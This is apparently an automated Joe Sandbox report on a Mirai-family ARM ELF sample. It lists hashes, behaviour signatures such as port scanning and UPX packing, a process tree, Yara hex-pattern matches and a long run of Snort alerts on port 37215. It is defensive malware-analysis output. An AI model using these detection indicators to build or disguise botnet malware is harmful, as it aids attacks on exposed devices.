Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm4.elf

Overview

General Information

Sample name:arm4.elf
Analysis ID:1454029
MD5:c0294f7f6da4f65b3f88b601abfcbe8b
SHA1:86749bac75e1d5f5c7fa91bc9a06b8694f3f99c9
SHA256:6b8065c3761f5f53eb5650d4fb77bde7e5a97ee43e8894fcf1794a76ccd186d5
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample is packed with UPX
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
HTTP GET or POST without a user agent
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1454029
Start date and time:2024-06-08 15:04:13 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 53s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm4.elf
Detection:MAL
Classification:mal92.troj.evad.linELF@0/0@10/0
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/arm4.elf
PID:5678
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Hello, world!
Standard Error:
  • system is lnxubuntu20
  • arm4.elf (PID: 5678, Parent: 5595, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm4.elf
    • arm4.elf New Fork (PID: 5682, Parent: 5678)
      • arm4.elf New Fork (PID: 5684, Parent: 5682)
      • arm4.elf New Fork (PID: 5685, Parent: 5682)
      • arm4.elf New Fork (PID: 5688, Parent: 5682)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
5678.1.00007f042c017000.00007f042c036000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    5678.1.00007f042c017000.00007f042c036000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      5678.1.00007f042c017000.00007f042c036000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1bc94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bca8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bcbc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bcd0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bce4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bcf8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bd0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bd20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bd34:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bd48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bd5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bd70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bd84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bd98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bdac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bdc0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bdd4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bde8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1bdfc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1be10:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1be24:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      5688.1.00007f042c017000.00007f042c036000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        5688.1.00007f042c017000.00007f042c036000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          Click to see the 7 entries
          Timestamp:06/08/24-15:05:50.745566
          SID:2829579
          Source Port:40166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155495
          SID:2829579
          Source Port:54698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184223
          SID:2829579
          Source Port:57626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463367
          SID:2829579
          Source Port:37936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843598
          SID:2835222
          Source Port:35390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351308
          SID:2835222
          Source Port:58580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733435
          SID:2835222
          Source Port:46424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516968
          SID:2829579
          Source Port:37108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057950
          SID:2835222
          Source Port:57200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108537
          SID:2835222
          Source Port:53556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673787
          SID:2829579
          Source Port:39166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448706
          SID:2835222
          Source Port:46132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236078
          SID:2829579
          Source Port:45416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351281
          SID:2835222
          Source Port:51578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742355
          SID:2835222
          Source Port:36188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273616
          SID:2829579
          Source Port:35812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462101
          SID:2835222
          Source Port:36824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016210
          SID:2835222
          Source Port:43204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112096
          SID:2829579
          Source Port:50970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468518
          SID:2829579
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262627
          SID:2829579
          Source Port:59374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896914
          SID:2835222
          Source Port:42376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021493
          SID:2835222
          Source Port:38188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269552
          SID:2835222
          Source Port:52988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016475
          SID:2829579
          Source Port:59706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822977
          SID:2835222
          Source Port:38146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172895
          SID:2835222
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264070
          SID:2835222
          Source Port:55866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599827
          SID:2835222
          Source Port:42100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884129
          SID:2829579
          Source Port:52552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708825
          SID:2829579
          Source Port:48724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275353
          SID:2835222
          Source Port:33550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273198
          SID:2829579
          Source Port:59426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600788
          SID:2835222
          Source Port:37886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444100
          SID:2835222
          Source Port:59114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552491
          SID:2829579
          Source Port:53272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884075
          SID:2835222
          Source Port:42540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912554
          SID:2829579
          Source Port:33218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705004
          SID:2829579
          Source Port:36286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108946
          SID:2835222
          Source Port:37516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893982
          SID:2829579
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271605
          SID:2835222
          Source Port:45560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179180
          SID:2829579
          Source Port:32898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890768
          SID:2835222
          Source Port:49126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668158
          SID:2835222
          Source Port:39314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604546
          SID:2829579
          Source Port:33554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237556
          SID:2835222
          Source Port:32790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353153
          SID:2829579
          Source Port:59294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884367
          SID:2829579
          Source Port:34176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038088
          SID:2829579
          Source Port:42862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242861
          SID:2829579
          Source Port:53270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109363
          SID:2829579
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.163176
          SID:2835222
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671280
          SID:2829579
          Source Port:48564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813601
          SID:2835222
          Source Port:47082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854372
          SID:2835222
          Source Port:35078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781118
          SID:2829579
          Source Port:58242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005818
          SID:2835222
          Source Port:46034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783473
          SID:2835222
          Source Port:34584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241015
          SID:2829579
          Source Port:49372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732473
          SID:2835222
          Source Port:35136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406309
          SID:2829579
          Source Port:47884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084893
          SID:2835222
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262511
          SID:2835222
          Source Port:35158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606376
          SID:2835222
          Source Port:41110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408616
          SID:2829579
          Source Port:48152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516448
          SID:2829579
          Source Port:50446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257602
          SID:2829579
          Source Port:51998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162653
          SID:2829579
          Source Port:51130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782346
          SID:2835222
          Source Port:48268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815512
          SID:2829579
          Source Port:60142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160102
          SID:2829579
          Source Port:50474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294695
          SID:2829579
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395909
          SID:2835222
          Source Port:57430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.805475
          SID:2829579
          Source Port:56776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.913518
          SID:2835222
          Source Port:36800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238051
          SID:2835222
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262661
          SID:2829579
          Source Port:34028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129577
          SID:2835222
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132949
          SID:2835222
          Source Port:42624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516476
          SID:2835222
          Source Port:50078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174658
          SID:2835222
          Source Port:35720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810803
          SID:2829579
          Source Port:38386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153858
          SID:2835222
          Source Port:48542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158369
          SID:2835222
          Source Port:53576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912599
          SID:2835222
          Source Port:36116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239855
          SID:2829579
          Source Port:42394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108810
          SID:2829579
          Source Port:33492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129237
          SID:2829579
          Source Port:55602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179567
          SID:2835222
          Source Port:56996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509579
          SID:2829579
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179660
          SID:2835222
          Source Port:59752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355832
          SID:2835222
          Source Port:36824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601536
          SID:2829579
          Source Port:33568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729732
          SID:2835222
          Source Port:45764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.824407
          SID:2829579
          Source Port:54254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671267
          SID:2835222
          Source Port:48420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784364
          SID:2829579
          Source Port:48542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183736
          SID:2835222
          Source Port:59968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841664
          SID:2835222
          Source Port:46090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553096
          SID:2835222
          Source Port:32984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174055
          SID:2835222
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440579
          SID:2829579
          Source Port:57470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114617
          SID:2835222
          Source Port:45922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517981
          SID:2829579
          Source Port:38554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733213
          SID:2835222
          Source Port:35474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169481
          SID:2829579
          Source Port:57172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306538
          SID:2835222
          Source Port:47022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272918
          SID:2835222
          Source Port:43486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158261
          SID:2829579
          Source Port:51750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180085
          SID:2829579
          Source Port:46468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056460
          SID:2829579
          Source Port:34958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131209
          SID:2829579
          Source Port:59764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495704
          SID:2835222
          Source Port:37760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035774
          SID:2835222
          Source Port:53164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551035
          SID:2835222
          Source Port:57958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157930
          SID:2829579
          Source Port:53838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446145
          SID:2835222
          Source Port:58970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858932
          SID:2829579
          Source Port:40888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806874
          SID:2835222
          Source Port:45388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464075
          SID:2829579
          Source Port:51626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703898
          SID:2829579
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466230
          SID:2829579
          Source Port:51122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063226
          SID:2829579
          Source Port:48144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058247
          SID:2829579
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731474
          SID:2829579
          Source Port:41018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512236
          SID:2835222
          Source Port:46772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185598
          SID:2835222
          Source Port:57242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670172
          SID:2835222
          Source Port:53290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129575
          SID:2829579
          Source Port:40464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153108
          SID:2829579
          Source Port:44986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405903
          SID:2835222
          Source Port:39738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512090
          SID:2829579
          Source Port:47358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745434
          SID:2829579
          Source Port:44744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354038
          SID:2829579
          Source Port:33222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378488
          SID:2835222
          Source Port:43982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173490
          SID:2835222
          Source Port:51732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016647
          SID:2829579
          Source Port:47886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515551
          SID:2829579
          Source Port:55208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731909
          SID:2835222
          Source Port:40398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158922
          SID:2829579
          Source Port:58896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016058
          SID:2829579
          Source Port:48672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601599
          SID:2835222
          Source Port:35530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114426
          SID:2829579
          Source Port:35544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781368
          SID:2829579
          Source Port:56286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461852
          SID:2835222
          Source Port:45514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351046
          SID:2835222
          Source Port:50794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.472033
          SID:2835222
          Source Port:42938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039459
          SID:2835222
          Source Port:36656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236870
          SID:2829579
          Source Port:42002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514646
          SID:2835222
          Source Port:60398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860394
          SID:2829579
          Source Port:39618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240515
          SID:2829579
          Source Port:39164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449472
          SID:2835222
